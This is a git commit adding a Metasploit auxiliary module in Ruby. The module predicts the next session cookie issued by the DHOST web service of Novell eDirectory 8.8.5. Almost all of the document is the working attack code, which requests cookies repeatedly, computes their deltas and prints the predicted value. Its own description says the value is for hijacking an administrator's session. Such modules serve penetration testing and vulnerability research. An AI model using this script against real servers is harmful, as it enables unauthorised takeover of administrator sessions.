Adds a module for eDirectory cookie prediction - trivial bug found while working on others.

git-svn-id: file:///home/svn/framework3/trunk@7493 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-13 21:31:39 +00:00 · 2009-11-13 21:31:39 +00:00 · fbdccdc9e2
parent 80ee6157ed
commit fbdccdc9e2
1 changed files with 86 additions and 0 deletions
--- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
+++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
@ -0,0 +1,86 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Novell eDirectory DHOST Predictable Session Cookie',
+			'Description'    => %q{
+				This module is able to predict the next session cookie value issued
+			by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
+			this module, wait until the real administrator logs in, then specify the
+			predicted cookie value to hijack their session.
+			},
+			'Author'         => 'hdm',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+		))
+
+		register_options([
+			Opt::RPORT(8030),
+			OptBool.new('SSL', [true, 'Use SSL', true])
+		], self.class)
+	end
+
+	def run
+		vals = []
+		name = ""
+
+		print_status("Making 5 requests to verify predictions...")
+		1.upto(6) do
+
+			connect
+			req =  "GET /dhost/ HTTP/1.1\r\n"
+			req << "Host: #{rhost}:#{rport}\r\n"
+			req << "Connection: close\r\n\r\n"
+			sock.put(req)
+			res = sock.get_once(-1,5)
+			disconnect
+
+			cookie = nil
+			if(res =~ /Cookie:\s*([^\s]+)\s*/mi)
+				cookie = $1
+				cookie,junk = cookie.split(';')
+				name,cookie = cookie.split('=')
+				cookie      = cookie.to_i(16)
+				vals << cookie
+			end
+		end
+
+		deltas   = []
+		prev_val = nil
+		vals.each_index do |i|
+			if(i > 0)
+				delta = vals[i] - prev_val
+				print_status("Cookie: #{i} #{"%.8x" % vals[i]} DELTA #{"%.8x" % delta}")
+				deltas << delta
+			end
+			prev_val = vals[i]
+		end
+
+		deltas.uniq!
+		if(deltas.length < 4)
+			print_status("The next cookie value will be: #{name}=#{"%.8x" % (prev_val + deltas[0])}")
+		else
+			print_status("The cookie value is less predictable, maybe this has been patched?")
+			print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}")
+		end
+	end
+
+end
+